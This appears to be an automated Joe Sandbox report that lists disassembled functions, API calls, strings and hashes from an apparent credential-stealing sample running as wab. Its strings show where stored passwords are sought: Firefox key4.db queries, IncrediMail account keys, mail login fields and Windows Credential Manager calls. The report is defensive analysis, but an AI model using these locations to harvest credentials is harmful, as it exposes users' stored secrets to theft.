                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$memcmpmemsetstrlen
                                                                                                                                                                                          • String ID: C@$SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                                                                                                          • API String ID: 2950547843-1835927508
                                                                                                                                                                                          • Opcode ID: 29e67128f806e27f32a5a844b83660c965dc1796d59f1ea4f69cdb33fe82b5c1
                                                                                                                                                                                          • Instruction ID: 4af0f314ee18ccde9e1bafe1ac3c0a9422d02a762a4adf5b984e4b61dd213191
                                                                                                                                                                                          • Opcode Fuzzy Hash: 29e67128f806e27f32a5a844b83660c965dc1796d59f1ea4f69cdb33fe82b5c1
                                                                                                                                                                                          • Instruction Fuzzy Hash: A961CA72A00218AFDB10EF75DC81BAE73A8AF04318F12457BF915E7281D678EE548799
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00402FCD Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 106registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                          • memset.MSVCRT ref: 00403010
                                                                                                                                                                                            • Part of subcall function 004104D7: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 004104FA
                                                                                                                                                                                          • memset.MSVCRT ref: 0040305D
                                                                                                                                                                                          • sprintf.MSVCRT ref: 00403075
                                                                                                                                                                                          • memset.MSVCRT ref: 004030A6
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 004030EE
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00403117
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$Close$EnumOpensprintf
                                                                                                                                                                                          • String ID: %s\Accounts$Identity$Software\IncrediMail\Identities
                                                                                                                                                                                          • API String ID: 3672803090-3168940695
                                                                                                                                                                                          • Opcode ID: 7c98ea0b3754888334cffa6cf5d7d188fa79ef3fb5e75e3e96ead78b92b55a2f
                                                                                                                                                                                          • Instruction ID: 39077b7eb5a2e68ecd5ff501a3ad8ea0a91829c9588d8d8ee698511e4ba158b1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c98ea0b3754888334cffa6cf5d7d188fa79ef3fb5e75e3e96ead78b92b55a2f
                                                                                                                                                                                          • Instruction Fuzzy Hash: EE3130B580021CFBDB11EB91CC82EEEBB7CAF15305F0041B6BA08A1152E7799F949F95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00408C8C Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowstringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Menu$Itemmemset$CountInfoModify_mbscatstrchr
                                                                                                                                                                                          • String ID: 0$6
                                                                                                                                                                                          • API String ID: 3540791495-3849865405
                                                                                                                                                                                          • Opcode ID: 74127b3a6ace4faeac3cb74118fb5aab17d7e36bf865af1988a44d13d40aa2ee
                                                                                                                                                                                          • Instruction ID: 3c8b7fd7a28504c7ca875bf426ab9eeebffe21bfd5384a9a2131e9ee4f2c6c2c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 74127b3a6ace4faeac3cb74118fb5aab17d7e36bf865af1988a44d13d40aa2ee
                                                                                                                                                                                          • Instruction Fuzzy Hash: CB31AD72408384AFD7209F91D940A9BBBE9EF84354F04493FFAC4A2291D778D9548F6A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00418FCA Relevance: 15.3, APIs: 6, Strings: 4, Instructions: 319COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$strlen
                                                                                                                                                                                          • String ID: -journal$-wal$immutable$nolock
                                                                                                                                                                                          • API String ID: 2619041689-3408036318
                                                                                                                                                                                          • Opcode ID: b4afe22544acede0a86ca576d850925b04083d6883ca1ee22da99f70356edf55
                                                                                                                                                                                          • Instruction ID: 01a3cfc3161f2179d827f175e8c33b529befff994fa447307002f7c0b3a07cf5
                                                                                                                                                                                          • Opcode Fuzzy Hash: b4afe22544acede0a86ca576d850925b04083d6883ca1ee22da99f70356edf55
                                                                                                                                                                                          • Instruction Fuzzy Hash: C7C1F372A04606AFDB14DFA9C841BDEFFB0BF44314F14825EE428E7281D778A994CB95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004019E9 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@$strlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4288758904-3916222277
                                                                                                                                                                                          • Opcode ID: 84b328311e417d15e7997145b2c24fd86ffd8b147b4043e2eff3435c1be22cd3
                                                                                                                                                                                          • Instruction ID: 24b34d1c19d378cbc4a311a34392409bda21909db6314ed607bd163125115c99
                                                                                                                                                                                          • Opcode Fuzzy Hash: 84b328311e417d15e7997145b2c24fd86ffd8b147b4043e2eff3435c1be22cd3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A61873440D782DFDB609F25948006BBBF0FB89315F54593FF5D2A22A1D739984ACB0A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00408458 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 152COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004045D6: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F07D,?,00000000), ref: 004045E3
                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004045FC
                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredFree), ref: 00404608
                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404614
                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404620
                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040462C
                                                                                                                                                                                          • wcslen.MSVCRT ref: 004084C2
                                                                                                                                                                                          • _wcsncoll.MSVCRT ref: 00408506
                                                                                                                                                                                          • memset.MSVCRT ref: 0040859A
                                                                                                                                                                                          • memcpy.MSVCRT ref: 004085BE
                                                                                                                                                                                          • wcschr.MSVCRT ref: 00408612
                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040863C
                                                                                                                                                                                            • Part of subcall function 00404780: FreeLibrary.KERNELBASE(?,?,0040F171,?,00000000), ref: 00404795
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$FreeLibrary$LoadLocal_wcsncollmemcpymemsetwcschrwcslen
                                                                                                                                                                                          • String ID: J$Microsoft_WinInet
                                                                                                                                                                                          • API String ID: 1371990430-260894208
                                                                                                                                                                                          • Opcode ID: 16b20249654c67f53eccac8b236a4263c6876ac6a245db74242d08f005f31d3d
                                                                                                                                                                                          • Instruction ID: daadb017bf7cdd7d7f2103bea61dec75ef30dccaf082131e005dcc9144427660
                                                                                                                                                                                          • Opcode Fuzzy Hash: 16b20249654c67f53eccac8b236a4263c6876ac6a245db74242d08f005f31d3d
                                                                                                                                                                                          • Instruction Fuzzy Hash: D55115B1508346AFD720DF65C980A5BB7E8FF89304F00492EF998D3251EB39E918CB56
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041025A Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410277
                                                                                                                                                                                          • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0041028B
                                                                                                                                                                                          • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410298
                                                                                                                                                                                          • memcpy.MSVCRT ref: 004102D6
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041027F
                                                                                                                                                                                          • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 00410293
                                                                                                                                                                                          • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410286
                                                                                                                                                                                          • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410272
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FromStringUuid$memcpy
                                                                                                                                                                                          • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                                                                                                          • API String ID: 2859077140-2022683286
                                                                                                                                                                                          • Opcode ID: 8ab31fcad472c8e0f7fc1e7956a4c0916ede4aff3821f8ba5262597d6c198381
                                                                                                                                                                                          • Instruction ID: e4eb6b96217285778323d40e2be480743d786dbe6d4556737564963462aa5f63
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ab31fcad472c8e0f7fc1e7956a4c0916ede4aff3821f8ba5262597d6c198381
                                                                                                                                                                                          • Instruction Fuzzy Hash: CC116D7290012EABDF11DEA4DC85EEB37ACEB49354F050423FD41E7201E6B8DD848BA6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406A1A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarystringwindowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 00406A3F
                                                                                                                                                                                          • FormatMessageA.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 00406A5D
                                                                                                                                                                                          • strlen.MSVCRT ref: 00406A6A
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00406A7A
                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00406A84
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00406A94
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                                                                                                                                          • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                          • API String ID: 2881943006-572158859
                                                                                                                                                                                          • Opcode ID: a50973e00e0714efe879abe5d0fa4de51feb90d783acbf5609d176ef6c22eee5
                                                                                                                                                                                          • Instruction ID: d85fce99d4424776e4d89386e5c8d6134dfcbe96067fcf7c7fc9c3f577b26335
                                                                                                                                                                                          • Opcode Fuzzy Hash: a50973e00e0714efe879abe5d0fa4de51feb90d783acbf5609d176ef6c22eee5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0801F7316001147FEB147B51EC46F9F7E28EB06791F21407AFA06F0091DA795E209AAC
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00404A94 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB3
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404AC5
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00404AD9
                                                                                                                                                                                          • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B04
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                          • API String ID: 2780580303-317687271
                                                                                                                                                                                          • Opcode ID: 0605f619fc244978403acb2e7e50909fcfc2fbf3368997ac03ccd37e60a8c8f1
                                                                                                                                                                                          • Instruction ID: 36f372293bcd99ea712e996d8bb82ea6b99e6deebf99936071b003413e9982ca
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0605f619fc244978403acb2e7e50909fcfc2fbf3368997ac03ccd37e60a8c8f1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 860149797516103BEB115BB19C49F7FBAACDB8674AF010035F602F2182DEBCC9018A5D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004093DD Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406D1F: GetFileAttributesA.KERNELBASE(?,00401EDD,?), ref: 00406D23
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004093F7
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00409407
                                                                                                                                                                                          • GetPrivateProfileIntA.KERNEL32(00451308,rtl,00000000,00451200), ref: 00409418
                                                                                                                                                                                            • Part of subcall function 00408FE9: GetPrivateProfileStringA.KERNEL32(00451308,?,0044551F,00451358,?,00451200), ref: 00409004
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                                                                                                          • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                          • API String ID: 888011440-2039793938
                                                                                                                                                                                          • Opcode ID: e990c3cc62237e0bab40cac14584cc26f7b64a30e3fa44b4e874bacec4a6fec9
                                                                                                                                                                                          • Instruction ID: 0b3e14b162d046b550c41b249f06feb679facb3af2f7b05e7ff0b413a15a09bb
                                                                                                                                                                                          • Opcode Fuzzy Hash: e990c3cc62237e0bab40cac14584cc26f7b64a30e3fa44b4e874bacec4a6fec9
                                                                                                                                                                                          • Instruction Fuzzy Hash: C6F09621F8435136FB203B325C03F2E29488BD2F56F1640BFBD08B65D3DAAD8811559E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0042DF2E Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 272COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • attached databases must use the same text encoding as main database, xrefs: 0042E12C
                                                                                                                                                                                          • database %s is already in use, xrefs: 0042E014
                                                                                                                                                                                          • cannot ATTACH database within transaction, xrefs: 0042DFAC
                                                                                                                                                                                          • database is already attached, xrefs: 0042E0DD
                                                                                                                                                                                          • unable to open database: %s, xrefs: 0042E21C
                                                                                                                                                                                          • out of memory, xrefs: 0042E235
                                                                                                                                                                                          • too many attached databases - max %d, xrefs: 0042DF97
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                          • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                          • API String ID: 1297977491-2001300268
                                                                                                                                                                                          • Opcode ID: 6ddab01290ce87d8ebd2da98a857a844c731627c1ed98d62f1e76250c556fc69
                                                                                                                                                                                          • Instruction ID: c7e7a29d1825d2e945301ab40bb758a3ed070f64a4837571caa387bbb47581b8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ddab01290ce87d8ebd2da98a857a844c731627c1ed98d62f1e76250c556fc69
                                                                                                                                                                                          • Instruction Fuzzy Hash: BFA1BC70608311DFD720DF2AE441A6BBBE4BF88318F54492FF48987252D778E945CB9A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00409989 Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 157COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097AB
                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097B9
                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097CA
                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097E1
                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097EA
                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 004099C0
                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 004099DC
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00409A04
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00409A21
                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 00409AAA
                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 00409AB4
                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 00409AEC
                                                                                                                                                                                            • Part of subcall function 00408B27: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
                                                                                                                                                                                            • Part of subcall function 00408B27: memcpy.MSVCRT ref: 00408C2F
                                                                                                                                                                                            • Part of subcall function 00408B27: _mbscpy.MSVCRT ref: 00408BA2
                                                                                                                                                                                            • Part of subcall function 00408B27: strlen.MSVCRT ref: 00408BC0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
                                                                                                                                                                                          • String ID: $$d
                                                                                                                                                                                          • API String ID: 2915808112-2066904009
                                                                                                                                                                                          • Opcode ID: aaabb9704ee97ed3d88bb120afced9611e84c7ee3aa1941d020b92fe57cbaf77
                                                                                                                                                                                          • Instruction ID: c499689f9fa1b304e99f77f7c015d52b7a22264b22564a6ed79451bf6b5d1632
                                                                                                                                                                                          • Opcode Fuzzy Hash: aaabb9704ee97ed3d88bb120afced9611e84c7ee3aa1941d020b92fe57cbaf77
                                                                                                                                                                                          • Instruction Fuzzy Hash: A6513B71601704AFD724DF69C582B9AB7F4BF48354F10892EE65ADB282EB74A940CF44
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00403158 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040312A: GetPrivateProfileStringA.KERNEL32(00000000,?,0044551F,?,?,?), ref: 0040314E
                                                                                                                                                                                          • strchr.MSVCRT ref: 0040326D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: PrivateProfileStringstrchr
                                                                                                                                                                                          • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                                                                                                          • API String ID: 1348940319-1729847305
                                                                                                                                                                                          • Opcode ID: 744f29d2d2deae3fb126fd39ba5d775996f393179d4ac578be52819d2814d06a
                                                                                                                                                                                          • Instruction ID: ebc3817507c74d0428b70d6b21ed795ce2a60aa758e9561c8f94ff6eeee5590f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 744f29d2d2deae3fb126fd39ba5d775996f393179d4ac578be52819d2814d06a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A318F7090420ABEEF219F60CC45BD9BFACEF14319F10816AF9587A1D2D7B89B948B54
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041096F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                          • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                          • API String ID: 3510742995-3273207271
                                                                                                                                                                                          • Opcode ID: 5f1fb5d69f7b5319dba649b4cfeeb14085fd9f05635fb8ab0532745b2c558304
                                                                                                                                                                                          • Instruction ID: 3875996c88d7773ad821c0e973cab4ee718d2e20412430da402bf8ed1fec6725
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f1fb5d69f7b5319dba649b4cfeeb14085fd9f05635fb8ab0532745b2c558304
                                                                                                                                                                                          • Instruction Fuzzy Hash: DF01D4F7EE469869FB3100094C23FEB4A8947A7720F360027F98525283A0CD0CD3429F
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00405E41 Relevance: 13.6, APIs: 9, Instructions: 58windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00405E58
                                                                                                                                                                                          • GetWindow.USER32(?,00000005), ref: 00405E70
                                                                                                                                                                                          • GetWindow.USER32(00000000), ref: 00405E73
                                                                                                                                                                                            • Part of subcall function 004015AF: GetWindowRect.USER32(?,?), ref: 004015BE
                                                                                                                                                                                            • Part of subcall function 004015AF: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004015D9
                                                                                                                                                                                          • GetWindow.USER32(00000000,00000002), ref: 00405E7F
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003ED), ref: 00405E96
                                                                                                                                                                                          • GetDlgItem.USER32(?,00000000), ref: 00405EA8
                                                                                                                                                                                          • GetDlgItem.USER32(?,00000000), ref: 00405EBA
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003ED), ref: 00405EC8
                                                                                                                                                                                          • SetFocus.USER32(00000000), ref: 00405ECB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Item$Rect$ClientFocusPoints
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2432066023-0
                                                                                                                                                                                          • Opcode ID: 859c870cb1f45ac1f52eef33470e4ab1ec2daf0450f8b20d97580b530be0d20d
                                                                                                                                                                                          • Instruction ID: 4031fba040b0e189dacc9fafa17b87c2e22a92f85e78ae2064a779fcc19fa509
                                                                                                                                                                                          • Opcode Fuzzy Hash: 859c870cb1f45ac1f52eef33470e4ab1ec2daf0450f8b20d97580b530be0d20d
                                                                                                                                                                                          • Instruction Fuzzy Hash: AE01E571500708AFDB112B62DC89E6BBFACEF81324F11442BF5449B252DBB8E8008E28
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040F2E4 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406E4C: GetVersionExA.KERNEL32(00451168,0000001A,00410749,00000104), ref: 00406E66
                                                                                                                                                                                          • memset.MSVCRT ref: 0040F396
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040F3AD
                                                                                                                                                                                          • _strnicmp.MSVCRT ref: 0040F3C7
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040F3F3
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040F413
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
